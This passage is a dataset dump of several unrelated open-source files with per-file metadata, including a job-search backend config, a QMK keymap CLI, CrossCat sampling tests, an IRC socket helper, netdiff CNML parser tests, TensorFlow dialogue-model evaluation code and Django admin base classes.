'21': u'Industrie pharmaceutique',
'10': u'Industries alimentaires',
'13': u'Industrie textile',
'24': u'Metallurgie',
'92': u'Orga. jeux hasard/argent',
'99': u'Organisations et organismes',
'03': u'Peche et aquaculture',
'35': u'Prod./distrib.elec/gaz/vap/air',
'59': u'Prod film cine/video/tv/musiq',
'98': u'Production menage bien propre',
'60': u'Programmation et diffusion',
'73': u'Publicite et etudes de marche',
'72': u'Rech.-dev. scientifique',
'33': u'Repar./instal. machines/equip.',
'95': u'Repar.pc/biens perso/domestiq',
'56': u'Restauration',
'97': u'Sce domestique pr particuliers',
'81': u'Services bat/amenagnt paysager',
'63': u'Services d\'information',
'96': u'Services personnels',
'09': u'Soutien industries extractives',
'02': u'Sylvicult./exploit. forestiere',
'61': u'Telecommunications',
'51': u'Transports aeriens',
'50': u'Transports par eau',
'49': u'Transports terrestres',
'16': u'Travail bois/fab. article bois',
'43': u'Travaux constr.specialises',
}.iteritems())])
CONFIG = BackendConfig(Value('metier', label='Job name', masked=False, default=''),
Value('place', label=u'Place', choices=places_choices, default='100|FRANCE|FRANCE'),
Value('contrat', label=u'Contract', choices=type_contrat_choices, default=''),
Value('salary', label=u'Salary', choices=salary_choices, default=''),
Value('qualification', label=u'Qualification', choices=qualification_choices, default=''),
Value('limit_date', label=u'Date limite', choices=limit_date_choices, default=''),
Value('domain', label=u'Domain', choices=domain_choices, default=''))
def search_job(self, pattern=None):
with self.browser:
return self.browser.search_job(pattern=pattern)
def advanced_search_job(self):
return self.browser.advanced_search_job(metier=self.config['metier'].get(),
place=self.config['place'].get(),
contrat=self.config['contrat'].get(),
salary=self.config['salary'].get(),
qualification=self.config['qualification'].get(),
limit_date=self.config['limit_date'].get(),
domain=self.config['domain'].get())
def get_job_advert(self, _id, advert=None):
with self.browser:
return self.browser.get_job_advert(_id, advert)
def fill_obj(self, advert, fields):
self.get_job_advert(advert.id, advert)
OBJECTS = {PopolemploiJobAdvert: fill_obj}
| agpl-3.0 | 5,952,296,868,497,060,000 | 48.070822 | 117 | 0.58163 | false |
nelseric/qmk_firmware | lib/python/qmk/cli/new/keymap.py | 16 | 1884 | """This script automates the copying of the default keymap into your own keymap.
"""
import shutil
from pathlib import Path
import qmk.path
from qmk.decorators import automagic_keyboard, automagic_keymap
from milc import cli
@cli.argument('-kb', '--keyboard', help='Specify keyboard name. Example: 1upkeyboards/1up60hse')
@cli.argument('-km', '--keymap', help='Specify the name for the new keymap directory')
@cli.subcommand('Creates a new keymap for the keyboard of your choosing')
@automagic_keyboard
@automagic_keymap
def new_keymap(cli):
"""Creates a new keymap for the keyboard of your choosing.
"""
# ask for user input if keyboard or keymap was not provided in the command line
keyboard = cli.config.new_keymap.keyboard if cli.config.new_keymap.keyboard else input("Keyboard Name: ")
keymap = cli.config.new_keymap.keymap if cli.config.new_keymap.keymap else input("Keymap Name: ")
# generate keymap paths
kb_path = Path('keyboards') / keyboard
keymap_path = qmk.path.keymap(keyboard)
keymap_path_default = keymap_path / 'default'
keymap_path_new = keymap_path / keymap
# check directories
if not kb_path.exists():
cli.log.error('Keyboard %s does not exist!', kb_path)
return False
if not keymap_path_default.exists():
cli.log.error('Keyboard default %s does not exist!', keymap_path_default)
return False
if keymap_path_new.exists():
cli.log.error('Keymap %s already exists!', keymap_path_new)
return False
# create user directory with default keymap files
shutil.copytree(keymap_path_default, keymap_path_new, symlinks=True)
# end message to user
cli.log.info("%s keymap directory created in: %s", keymap, keymap_path_new)
cli.log.info("Compile a firmware with your new keymap by typing: \n\n\tqmk compile -kb %s -km %s\n", keyboard, keymap)
| gpl-2.0 | 5,085,182,209,697,416,000 | 39.085106 | 122 | 0.706476 | false |
fivejjs/crosscat | crosscat/cython_code/test_sample.py | 1 | 4283 | #
# Copyright (c) 2010-2014, MIT Probabilistic Computing Project
#
# Lead Developers: Dan Lovell and Jay Baxter
# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka
# Research Leads: Vikash Mansinghka, Patrick Shafto
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import sys
from collections import Counter
#
import numpy
import pylab
pylab.ion()
pylab.show()
#
import crosscat.tests.plot_utils as pu
import crosscat.utils.file_utils as fu
import crosscat.utils.sample_utils as su
import crosscat.utils.api_utils as au
# parse some arguments
parser = argparse.ArgumentParser()
parser.add_argument('pkl_name', type=str)
parser.add_argument('--inf_seed', default=0, type=int)
parser.add_argument('--hostname', default='127.0.0.1', type=str)
args = parser.parse_args()
pkl_name = args.pkl_name
inf_seed = args.inf_seed
hostname = args.hostname
# FIXME: getting weird error on conversion to int: too large from inside pyx
def get_next_seed(max_val=32767): # sys.maxint):
return random_state.randint(max_val)
# resume from saved name
save_dict = fu.unpickle(pkl_name)
random_state = numpy.random.RandomState(inf_seed)
M_c = save_dict['M_c']
X_L = save_dict['X_L']
X_D = save_dict['X_D']
# FIXME: test constraints
# Y = [su.Bunch(index=2,value=2.3), su.Bunch(index=0,value=-4.)]
Y = None
# test simple_predictive_sample_observed
views_replicating_samples_params = su.determine_replicating_samples_params(X_L, X_D)
views_samples = []
for replicating_samples_params in views_replicating_samples_params:
this_view_samples = []
for replicating_sample_params in replicating_samples_params:
this_view_this_sample = su.simple_predictive_sample(
M_c, X_L, X_D, get_next_seed=get_next_seed, **replicating_sample_params)
this_view_samples.extend(this_view_this_sample)
views_samples.append(this_view_samples)
for view_idx, view_samples in enumerate(views_samples):
data_array = numpy.array(view_samples)
pu.plot_T(data_array)
pylab.title('simple_predictive_sample observed, view %s on local' % view_idx)
# test simple_predictive_sample_observed REMOTE
# hostname = 'ec2-23-22-208-4.compute-1.amazonaws.com'
URI = 'http://' + hostname + ':8007'
method_name = 'simple_predictive_sample'
#
views_samples = []
for replicating_samples_params in views_replicating_samples_params:
this_view_samples = []
for replicating_sample_params in replicating_samples_params:
args_dict = dict(
M_c=save_dict['M_c'],
X_L=save_dict['X_L'],
X_D=save_dict['X_D'],
Y=replicating_sample_params['Y'],
Q=replicating_sample_params['Q'],
n=replicating_sample_params['n'],
)
this_view_this_sample, id = au.call(
method_name, args_dict, URI)
print id
this_view_samples.extend(this_view_this_sample)
views_samples.append(this_view_samples)
for view_idx, view_samples in enumerate(views_samples):
data_array = numpy.array(view_samples)
pu.plot_T(data_array)
pylab.title('simple_predictive_sample observed, view %s on remote' % view_idx)
# test simple_predictive_sample_unobserved
observed_Q = views_replicating_samples_params[0][0]['Q']
Q = [(int(1E6), old_tuple[1]) for old_tuple in observed_Q]
new_row_samples = []
new_row_sample = su.simple_predictive_sample(
M_c, X_L, X_D, Y, Q, get_next_seed, n=1000)
new_row_samples.extend(new_row_sample)
new_row_samples = numpy.array(new_row_samples)
pu.plot_T(new_row_samples)
# once more with constraint
Y = [(int(1E6), 0, 100)]
new_row_sample = su.simple_predictive_sample(
M_c, X_L, X_D, Y, Q, get_next_seed, n=1)
# test impute
# imputed_value = su.impute(M_c, X_L, X_D, Y, [Q[3]], 100, get_next_seed)
| apache-2.0 | 8,966,423,893,119,867,000 | 35.29661 | 84 | 0.69951 | false |
brahle/I-Rcbot | irc/mysocket.py | 1 | 1895 | #!/usr/bin/env python2.6
# Zeckviz IRC bot
# Copyright (C) 2011 Bruno Rahle
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
class MySocket(socket.socket):
"""Extends socket.socket class and adds the functionality to reads the data
from socket line by line.
"""
BUFFER_SIZE = 4096 # size of the buffer to read
def __init__(self, host, port):
"""Creates the socket.
"""
super(MySocket, self).__init__()
self.connect((host, port))
self._buffer = ''
self._pos = 0
def readline(self):
"""Reads the next line from the socket.
NOTE: Ignores the timeout and blocking status. It just waits for the
complete line to be sent to the socket and returns it.
TODO: account for timeout and blocking status.
"""
        line = ''
        while True:
            # Refill the buffer whenever it has been fully consumed.
            while self._pos == len(self._buffer):
                self._buffer = self.recv(self.BUFFER_SIZE)
                self._pos = 0
            end = self._buffer.find('\n', self._pos)
            if end == -1:
                # No newline yet: consume the whole buffer and keep reading.
                line = line + self._buffer[self._pos:]
                self._pos = len(self._buffer)
            else:
                line = line + self._buffer[self._pos:end]
                self._pos = end + 1
                return line
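# Minimal usage sketch (illustrative only; the host, port, and protocol are
# assumptions, not part of this module):
#
#   sock = MySocket('irc.example.org', 6667)
#   line = sock.readline()  # blocks until a full '\n'-terminated line arrives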
| agpl-3.0 | -2,516,814,916,496,474,000 | 34.092593 | 79 | 0.616359 | false |
ctogle/dilapidator | src/dilap/BROKEN/generate/toremove/street.py | 1 | 1258 | import dilap.core.context as dgc
import dilap.generate.landscape as dls
import dilap.generate.lot as dlt
import dilap.primitive.road as dr
import dp_vector as dpv
import dp_quaternion as dpq
class street(dgc.context):
def generate(self,worn = 0):
start = dpv.vector(-100,-300, 20)
end = dpv.vector( 100, 300,-10)
tip = dpv.vector(0,1,0)
tail = dpv.vector(1,1,0)
cs = [dpv.vector(-100,-100, 10),dpv.vector( 100, 100,-10)]
rd = dr.road(start,end,tip,tail,controls = cs)
self._nodes_to_graph(self._node_wrap(rd))
#bbs = []
#lotspace = rd._lotspace(bbs)
#dlot = dlt.lot(lotspace[0],lotspace[1]).generate(worn)
#lsppos,lsprot = lotspace[2],lotspace[3]
#dlot._transform(lsppos,lsprot,dpv.one())
#self._consume(dlot)
#lotspace = rd._lotspace(bbs)
#dlot = dlt.lot(lotspace[0],lotspace[1]).generate(worn)
#lsppos,lsprot = lotspace[2],lotspace[3]
#dlot._transform(lsppos,lsprot,dpv.one())
#self._consume(dlot)
tpts = []
#tpts.extend(dlot.terrain_points)
tpts.extend(rd._terrain_points())
lscape = dls.landscape(controls = tpts)
self._consume(lscape.generate(worn))
| mit | -4,722,324,031,005,298,000 | 30.45 | 66 | 0.605723 | false |
ninuxorg/netdiff | tests/test_cnml.py | 1 | 4009 | import os
import libcnml
import networkx
from netdiff import CnmlParser, diff
from netdiff.exceptions import ParserError
from netdiff.tests import TestCase
CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))
cnml1 = '{0}/static/26494_detail_1.cnml'.format(CURRENT_DIR)
cnml2 = '{0}/static/26494_detail_2.cnml'.format(CURRENT_DIR)
cnml3 = '{0}/static/26494_detail_3.cnml'.format(CURRENT_DIR)
class TestCnmlParser(TestCase):
def test_parse(self):
p = CnmlParser(cnml1)
self.assertIsInstance(p.graph, networkx.Graph)
def test_parse_exception(self):
with self.assertRaises(ParserError):
CnmlParser('{ "test": "test" }')
def test_json_dict(self):
p = CnmlParser(cnml1)
data = p.json(dict=True)
self.assertIsInstance(data, dict)
self.assertEqual(data['type'], 'NetworkGraph')
self.assertEqual(data['protocol'], 'static')
self.assertEqual(data['version'], None)
self.assertEqual(data['revision'], None)
self.assertEqual(data['metric'], None)
self.assertIsInstance(data['nodes'], list)
self.assertIsInstance(data['links'], list)
self.assertEqual(len(data['nodes']), 5)
self.assertEqual(len(data['links']), 3)
def test_json_string(self):
p = CnmlParser(cnml1)
data = p.json()
self.assertIsInstance(data, str)
self.assertIn('NetworkGraph', data)
self.assertIn('protocol', data)
self.assertIn('version', data)
self.assertIn('revision', data)
self.assertIn('metric', data)
self.assertIn('null', data)
self.assertIn('links', data)
self.assertIn('nodes', data)
def test_no_changes(self):
old = CnmlParser(cnml1)
new = CnmlParser(cnml1)
result = diff(old, new)
self.assertIsInstance(result, dict)
self.assertIsNone(result['added'])
self.assertIsNone(result['removed'])
def test_added_1_link(self):
old = CnmlParser(cnml1)
new = CnmlParser(cnml2)
result = diff(old, new)
self.assertIsNone(result['removed'])
# ensure there are differences
self.assertEqual(len(result['added']['links']), 1)
# ensure 1 link added
self.assertIn('10.228.172.97', result['added']['links'][0].values())
self.assertIn('10.228.172.101', result['added']['links'][0].values())
def test_removed_1_link(self):
old = CnmlParser(cnml2)
new = CnmlParser(cnml1)
result = diff(old, new)
self.assertIsInstance(result, dict)
self.assertIsNone(result['added'])
self.assertTrue(type(result['removed']['links']) is list)
# ensure there are differences
self.assertEqual(len(result['removed']['links']), 1)
# ensure 1 link removed
self.assertIn('10.228.172.97', result['removed']['links'][0].values())
self.assertIn('10.228.172.101', result['removed']['links'][0].values())
def test_simple_diff(self):
old = CnmlParser(cnml1)
new = CnmlParser(cnml3)
result = diff(old, new)
# ensure there are differences
self.assertEqual(len(result['added']['links']), 2)
self.assertEqual(len(result['removed']['links']), 2)
# ensure 2 links added
self._test_expected_links(
graph=result['added'],
expected_links=[
('10.228.172.97', '10.228.172.101'),
('10.228.172.194', '10.228.172.193'),
],
)
# ensure 2 links removed
self._test_expected_links(
graph=result['removed'],
expected_links=[
('10.228.172.33', '10.228.172.34'),
('10.228.172.33', '10.228.172.36'),
],
)
def test_parse_error(self):
with self.assertRaises(ParserError):
CnmlParser(1)
def test_cnml_argument(self):
cnml = libcnml.CNMLParser(cnml1)
CnmlParser(cnml)
| mit | -38,226,968,968,311,980 | 34.166667 | 79 | 0.59566 | false |
jurcicek/ndm | ndm/model.py | 1 | 19396 | #!/usr/bin/env python3
from statistics import mean
import tensorflow as tf
import numpy as np
from tfx.logging import LogMessage
class BaseModel:
def __init__(self, data, FLAGS):
self.data = data
self.FLAGS = FLAGS
self.batch_idx = tf.placeholder("int32", name='batch_idx')
self.phase_train = tf.placeholder(tf.bool, name='phase_train')
self.dropout_keep_prob = tf.placeholder("float32", name='dropout_keep_prob')
self.use_inputs_prob = tf.placeholder("float32", name='use_inputs_prob')
class ModelW2W(BaseModel):
def __init__(self, data, FLAGS):
super(ModelW2W, self).__init__(data, FLAGS)
@staticmethod
def batch_evaluate(func, indexes):
tps, tls, tas = [], [], []
for batch_idx in indexes:
predictions, lss, acc = func(batch_idx)
# print('X1', predictions.shape)
tps.append(np.expand_dims(predictions, axis=0))
tls.append(float(lss))
tas.append(float(acc))
predictions = np.concatenate(tps)
# print('X1', predictions.shape)
lss = mean(tls)
acc = mean(tas)
return predictions, lss, acc
def evaluate(self, epoch, learning_rate, sess):
m = LogMessage()
m.add()
m.add('Epoch: {epoch}'.format(epoch=epoch))
m.add(' - learning rate = {lr:f}'.format(lr=learning_rate.eval()))
def batch_eval_1(batch_idx):
return sess.run(
[self.predictions, self.loss, self.accuracy],
feed_dict={
self.batch_idx: batch_idx,
self.use_inputs_prob: 1.0,
self.dropout_keep_prob: 1.0,
self.phase_train: False,
}
)
train_predictions, train_loss, train_accuracy_action = self.batch_evaluate(batch_eval_1, self.data.train_batch_indexes)
m.add(' Train data')
m.add(' - use inputs prob = {uip:f}'.format(uip=1.0))
m.add(' - loss = {lss:f}'.format(lss=train_loss))
m.add(' - accuracy = {acc:f}'.format(acc=train_accuracy_action))
def batch_eval_0(batch_idx):
return sess.run(
[self.predictions, self.loss, self.accuracy],
feed_dict={
self.batch_idx: batch_idx,
self.use_inputs_prob: 0.0,
self.dropout_keep_prob: 1.0,
self.phase_train: False,
}
)
self.train_predictions_action, train_loss, train_accuracy_action = self.batch_evaluate(batch_eval_0, self.data.train_batch_indexes)
self.train_predictions_action_argmax = np.argmax(self.train_predictions_action, axis=2)
m.add(' - use inputs prob = {uip:f}'.format(uip=0.0))
m.add(' - loss = {lss:f}'.format(lss=train_loss))
m.add(' - accuracy = {acc:f}'.format(acc=train_accuracy_action))
self.dev_predictions_action, dev_loss, dev_accuracy_action = self.batch_evaluate(batch_eval_0, self.data.dev_batch_indexes)
self.dev_predictions_action_argmax = np.argmax(self.dev_predictions_action, axis=2)
m.add(' Dev data')
m.add(' - use inputs prob = {uip:f}'.format(uip=0.0))
m.add(' - loss = {lss:f}'.format(lss=dev_loss))
m.add(' - accuracy = {acc:f}'.format(acc=dev_accuracy_action))
m.add()
m.log()
self.test_predictions_action, test_loss, test_accuracy_action = self.batch_evaluate(batch_eval_0, self.data.test_batch_indexes)
self.test_predictions_action_argmax = np.argmax(self.test_predictions_action, axis=2)
m.add(' Test data')
m.add(' - use inputs prob = {uip:f}'.format(uip=0.0))
m.add(' - loss = {lss:f}'.format(lss=test_loss))
m.add(' - accuracy = {acc:f}'.format(acc=test_accuracy_action))
m.add()
m.log()
return train_accuracy_action, train_loss, \
dev_accuracy_action, dev_loss, \
test_accuracy_action, test_loss
def log_predictions_dataset(self, log_fn, actions, batch_indexes):
m = LogMessage(log_fn=log_fn)
m.add('Shape of action predictions: {s}'.format(s=actions.shape))
m.add('Argmax predictions')
m.add()
for prediction_batch_idx, batch_idx in enumerate(batch_indexes):
for history in range(0, self.data.batch_histories.shape[1]):
m.add('History {h}'.format(h=prediction_batch_idx * self.FLAGS.batch_size + history))
for j in range(self.data.batch_histories.shape[2]):
utterance = []
for k in range(self.data.batch_histories.shape[3]):
w = self.data.idx2word_history[self.data.batch_histories[batch_idx, history, j, k]]
if w not in ['_SOS_', '_EOS_']:
utterance.append(w)
if utterance:
m.add('U {j}: {c:80}'.format(j=j, c=' '.join(utterance)))
prediction = []
for j in range(actions.shape[2]):
w = self.data.idx2word_action[actions[prediction_batch_idx, history, j]]
if w not in ['_SOS_', '_EOS_']:
prediction.append(w)
m.add('P : {t:80}'.format(t=' '.join(prediction)))
target = []
for j in range(self.data.batch_actions.shape[2]):
w = self.data.idx2word_action[self.data.batch_actions[batch_idx, history, j]]
if w not in ['_SOS_', '_EOS_']:
target.append(w)
m.add('T : {t:80}'.format(t=' '.join(target)))
m.add()
# m.log(print_console=True, append=False)
m.log(print_console=False, append=False)
def log_predictions(self):
self.log_predictions_dataset(
'predictions_train_set.txt',
actions=self.train_predictions_action_argmax,
batch_indexes=self.data.train_batch_indexes
)
self.log_predictions_dataset(
'predictions_dev_set.txt',
actions=self.dev_predictions_action_argmax,
batch_indexes=self.data.dev_batch_indexes
)
self.log_predictions_dataset(
'predictions_test_set.txt',
actions=self.test_predictions_action_argmax,
batch_indexes=self.data.test_batch_indexes
)
class ModelW2T(BaseModel):
def __init__(self, data, FLAGS):
super(ModelW2T, self).__init__(data, FLAGS)
@staticmethod
def batch_evaluate(func, indexes):
tps, tls, tas = [], [], []
for batch_idx in indexes:
predictions, lss, acc = func(batch_idx)
# print('X1', predictions.shape)
tps.append(np.expand_dims(predictions, axis=0))
tls.append(float(lss))
tas.append(float(acc))
predictions = np.concatenate(tps)
# print('X1', predictions.shape)
lss = mean(tls)
acc = mean(tas)
return predictions, lss, acc
def evaluate(self, epoch, learning_rate, sess):
m = LogMessage()
m.add('')
m.add('Epoch: {epoch}'.format(epoch=epoch))
m.add(' - learning rate = {lr:e}'.format(lr=learning_rate.eval()))
def batch_eval(batch_idx):
return sess.run(
[self.predictions, self.loss, self.accuracy],
feed_dict={
self.batch_idx: batch_idx,
self.use_inputs_prob: 1.0,
self.dropout_keep_prob: 1.0,
self.phase_train: False,
}
)
self.train_predictions_action, train_loss, train_accuracy_action = self.batch_evaluate(batch_eval, self.data.train_batch_indexes)
self.train_predictions_action_argmax = np.argmax(self.train_predictions_action, axis=2)
m.add(' Train data')
m.add(' - loss = {lss:f}'.format(lss=train_loss))
m.add(' - accuracy = {acc:f}'.format(acc=train_accuracy_action))
self.dev_predictions_action, dev_loss, dev_accuracy_action = self.batch_evaluate(batch_eval, self.data.dev_batch_indexes)
self.dev_predictions_action_argmax = np.argmax(self.dev_predictions_action, axis=2)
m.add(' Dev data')
m.add(' - loss = {lss:f}'.format(lss=dev_loss))
m.add(' - accuracy = {acc:f}'.format(acc=dev_accuracy_action))
self.test_predictions_action, test_loss, test_accuracy_action = self.batch_evaluate(batch_eval, self.data.test_batch_indexes)
self.test_predictions_action_argmax = np.argmax(self.test_predictions_action, axis=2)
m.add(' Test data')
m.add(' - loss = {lss:f}'.format(lss=test_loss))
m.add(' - accuracy = {acc:f}'.format(acc=test_accuracy_action))
m.add()
m.log()
return train_accuracy_action, train_loss, \
dev_accuracy_action, dev_loss, \
test_accuracy_action, test_loss
def log_predictions_dataset(self, log_fn, actions_template, batch_indexes):
m = LogMessage(log_fn=log_fn)
m.add('Shape of action template predictions: {s}'.format(s=actions_template.shape))
m.add()
m.add('Predictions')
m.add()
# print(self.data.batch_histories.shape)
# print(self.data.batch_actions_template.shape)
# print(actions_template.shape)
# print(len(batch_indexes))
for prediction_batch_idx, batch_idx in enumerate(batch_indexes):
for history in range(0, self.data.batch_histories.shape[1]):
m.add('History {h}'.format(h=prediction_batch_idx * self.FLAGS.batch_size + history))
for j in range(self.data.batch_histories.shape[2]):
utterance = []
for k in range(self.data.batch_histories.shape[3]):
w = self.data.idx2word_history[self.data.batch_histories[batch_idx, history, j, k]]
if w not in ['_SOS_', '_EOS_']:
utterance.append(w)
if utterance:
m.add('U {j}: {c:80}'.format(j=j, c=' '.join(utterance)))
m.add('P : {t:80}'.format(
t=self.data.idx2word_action_template[actions_template[prediction_batch_idx, history]])
)
m.add('T : {t:80}'.format(
t=self.data.idx2word_action_template[self.data.batch_actions_template[batch_idx, history]])
)
m.add()
# m.log()
m.log(print_console=False, append=False)
def log_predictions(self):
self.log_predictions_dataset(
'predictions_train_set.txt',
actions_template=self.train_predictions_action_argmax,
batch_indexes=self.data.train_batch_indexes
)
self.log_predictions_dataset(
'predictions_dev_set.txt',
actions_template=self.dev_predictions_action_argmax,
batch_indexes=self.data.dev_batch_indexes
)
self.log_predictions_dataset(
'predictions_test_set.txt',
actions_template=self.test_predictions_action_argmax,
batch_indexes=self.data.test_batch_indexes
)
class ModelW2TArgs(BaseModel):
def __init__(self, data, FLAGS):
super(ModelW2TArgs, self).__init__(data, FLAGS)
@staticmethod
def batch_evaluate(func, indexes):
tp1s, tp2s, tls, ta1s, ta2s = [], [], [], [], []
for batch_idx in indexes:
predictions1, predictions2, lss, acc1, acc2 = func(batch_idx)
# print('X1', predictions.shape)
tp1s.append(np.expand_dims(predictions1, axis=0))
tp2s.append(np.expand_dims(predictions2, axis=0))
tls.append(float(lss))
ta1s.append(float(acc1))
ta2s.append(float(acc2))
predictions1 = np.concatenate(tp1s)
predictions2 = np.concatenate(tp2s)
# print('X1', predictions.shape)
lss = mean(tls)
acc1 = mean(ta1s)
acc2 = mean(ta2s)
return predictions1, predictions2, lss, acc1, acc2
def evaluate(self, epoch, learning_rate, sess):
m = LogMessage()
m.add('')
m.add('Epoch: {epoch}'.format(epoch=epoch))
m.add(' - learning rate = {lr:e}'.format(lr=learning_rate.eval()))
def batch_eval(batch_idx):
return sess.run(
[
self.predictions_action, self.predictions_arguments,
self.loss,
self.accuracy_action, self.accuracy_arguments
],
feed_dict={
self.batch_idx: batch_idx,
self.use_inputs_prob: 1.0,
self.dropout_keep_prob: 1.0,
self.phase_train: False,
}
)
self.train_predictions_action, self.train_predictions_arguments, \
train_loss, \
train_accuracy_action, train_accuracy_arguments = self.batch_evaluate(batch_eval, self.data.train_batch_indexes)
self.train_predictions_action_argmax = np.argmax(self.train_predictions_action, axis=2)
self.train_predictions_arguments_argmax = np.argmax(self.train_predictions_arguments, axis=3)
m.add(' Train data')
m.add(' - loss = {lss:f}'.format(lss=train_loss))
m.add(' - accuracy action = {acc:f}'.format(acc=train_accuracy_action))
m.add(' - accuracy arguments = {acc:f}'.format(acc=train_accuracy_arguments))
self.dev_predictions_action, self.dev_predictions_arguments, \
dev_loss, \
dev_accuracy_action, dev_accuracy_arguments = self.batch_evaluate(batch_eval, self.data.dev_batch_indexes)
self.dev_predictions_action_argmax = np.argmax(self.dev_predictions_action, axis=2)
self.dev_predictions_arguments_argmax = np.argmax(self.dev_predictions_arguments, axis=3)
m.add(' Dev data')
m.add(' - loss = {lss:f}'.format(lss=dev_loss))
m.add(' - accuracy action = {acc:f}'.format(acc=dev_accuracy_action))
m.add(' - accuracy arguments = {acc:f}'.format(acc=dev_accuracy_arguments))
self.test_predictions_action, self.test_predictions_arguments, \
test_loss, \
test_accuracy_action, test_accuracy_arguments = self.batch_evaluate(batch_eval, self.data.test_batch_indexes)
self.test_predictions_action_argmax = np.argmax(self.test_predictions_action, axis=2)
self.test_predictions_arguments_argmax = np.argmax(self.test_predictions_arguments, axis=3)
m.add(' Test data')
m.add(' - loss = {lss:f}'.format(lss=test_loss))
m.add(' - accuracy action = {acc:f}'.format(acc=test_accuracy_action))
m.add(' - accuracy arguments = {acc:f}'.format(acc=test_accuracy_arguments))
m.add()
m.log()
return 0.5 * (train_accuracy_action + train_accuracy_arguments), train_loss, \
0.5 * (dev_accuracy_action + dev_accuracy_arguments), dev_loss, \
0.5 * (test_accuracy_action + test_accuracy_arguments), test_loss
def log_predictions_dataset(self, log_fn, actions_template, actions_arguments, batch_indexes):
m = LogMessage(log_fn=log_fn)
m.add('Shape of action template predictions: {s}'.format(s=actions_template.shape))
m.add('Shape of action arguments predictions: {s}'.format(s=actions_arguments.shape))
m.add()
m.add('Predictions')
m.add()
# print(self.data.batch_histories.shape)
# print(self.data.batch_actions_template.shape)
# print(self.data.batch_actions_arguments.shape)
# print(actions_template.shape)
# print(actions_arguments.shape)
# print(len(batch_indexes))
for prediction_batch_idx, batch_idx in enumerate(batch_indexes):
for history in range(0, self.data.batch_histories.shape[1]):
m.add('History {h}'.format(h=prediction_batch_idx * self.FLAGS.batch_size + history))
for j in range(self.data.batch_histories.shape[2]):
utterance = []
for k in range(self.data.batch_histories.shape[3]):
w = self.data.idx2word_history[self.data.batch_histories[batch_idx, history, j, k]]
if w not in ['_SOS_', '_EOS_']:
utterance.append(w)
if utterance:
m.add('U {j:2} : {c:80}'.format(j=j, c=' '.join(utterance)))
w_histories_arguments = []
for j in range(self.data.batch_histories_arguments.shape[2]):
w = self.data.idx2word_history_arguments[self.data.batch_histories_arguments[batch_idx, history, j]]
w_histories_arguments.append(w)
m.add('ArgsH: {t:80}'.format(t=', '.join(w_histories_arguments)))
m.add('P : {t:80}'.format(
t=self.data.idx2word_action_template[actions_template[prediction_batch_idx, history]])
)
w_actions_arguments = []
for j in range(actions_arguments.shape[2]):
w = self.data.idx2word_action_arguments[actions_arguments[prediction_batch_idx, history, j]]
w_actions_arguments.append(w)
m.add('ArgsP: {t:80}'.format(t=', '.join(w_actions_arguments)))
m.add('T : {t:80}'.format(
t=self.data.idx2word_action_template[self.data.batch_actions_template[batch_idx, history]])
)
w_actions_arguments = []
for j in range(self.data.batch_actions_arguments.shape[2]):
w = self.data.idx2word_action_arguments[self.data.batch_actions_arguments[batch_idx, history, j]]
w_actions_arguments.append(w)
m.add('ArgsT: {t:80}'.format(t=', '.join(w_actions_arguments)))
m.add()
# m.log(print_console=True, append=False)
m.log(print_console=False, append=False)
def log_predictions(self):
self.log_predictions_dataset(
'predictions_train_set.txt',
actions_template=self.train_predictions_action_argmax,
actions_arguments=self.train_predictions_arguments_argmax,
batch_indexes=self.data.train_batch_indexes
)
self.log_predictions_dataset(
'predictions_dev_set.txt',
actions_template=self.dev_predictions_action_argmax,
actions_arguments=self.dev_predictions_arguments_argmax,
batch_indexes=self.data.dev_batch_indexes
)
self.log_predictions_dataset(
'predictions_test_set.txt',
actions_template=self.test_predictions_action_argmax,
actions_arguments=self.test_predictions_arguments_argmax,
batch_indexes=self.data.test_batch_indexes
)
| apache-2.0 | -3,818,700,218,189,610,000 | 41.257081 | 139 | 0.562951 | false |
idlesign/django-etc | etc/admin/admins.py | 1 | 2599 | from django.contrib import admin
from django.contrib import messages
from django.db import models
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect
from django.urls import path
if False: # pragma: nocover
from .models import CustomModelPage # noqa
class EtcAdmin(admin.ModelAdmin):
"""Base etc admin."""
def message_success(self, request: HttpRequest, msg: str):
self.message_user(request, msg, messages.SUCCESS)
def message_warning(self, request: HttpRequest, msg: str):
self.message_user(request, msg, messages.WARNING)
def message_error(self, request: HttpRequest, msg: str):
self.message_user(request, msg, messages.ERROR)
class ReadonlyAdmin(EtcAdmin):
"""Read-only etc admin base class."""
view_on_site: bool = False
actions = None
def has_add_permission(self, request: HttpRequest) -> bool:
return False
def has_delete_permission(self, request: HttpRequest, obj: models.Model = None) -> bool:
return False
def changeform_view(
self,
request: HttpRequest,
object_id: int = None,
form_url: str = '',
extra_context: dict = None
) -> HttpResponse:
extra_context = extra_context or {}
extra_context.update({
'show_save_and_continue': False,
'show_save': False,
})
return super().changeform_view(request, object_id, extra_context=extra_context)
class CustomPageModelAdmin(ReadonlyAdmin):
"""Base for admin pages with contents based on custom models."""
def get_urls(self) -> list:
meta = self.model._meta
patterns = [path(
'',
self.admin_site.admin_view(self.view_custom),
name=f'{meta.app_label}_{meta.model_name}_changelist'
)]
return patterns
def has_add_permission(self, request: HttpRequest) -> bool:
return True
def view_custom(self, request: HttpRequest) -> HttpResponse:
context: dict = {
'show_save_and_continue': False,
'show_save_and_add_another': False,
'title': self.model._meta.verbose_name,
}
return self._changeform_view(request, object_id=None, form_url='', extra_context=context)
def response_add(self, request: HttpRequest, obj: 'CustomModelPage', post_url_continue=None):
return HttpResponseRedirect(request.path)
def save_model(self, request: HttpRequest, obj: 'CustomModelPage', form, change):
obj.bound_request = request
obj.bound_admin = self
obj.save()
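# Minimal usage sketch (assumptions: the page model and the import paths are
# illustrative; only the admin base classes above come from this file):
#
#   from django.contrib import admin
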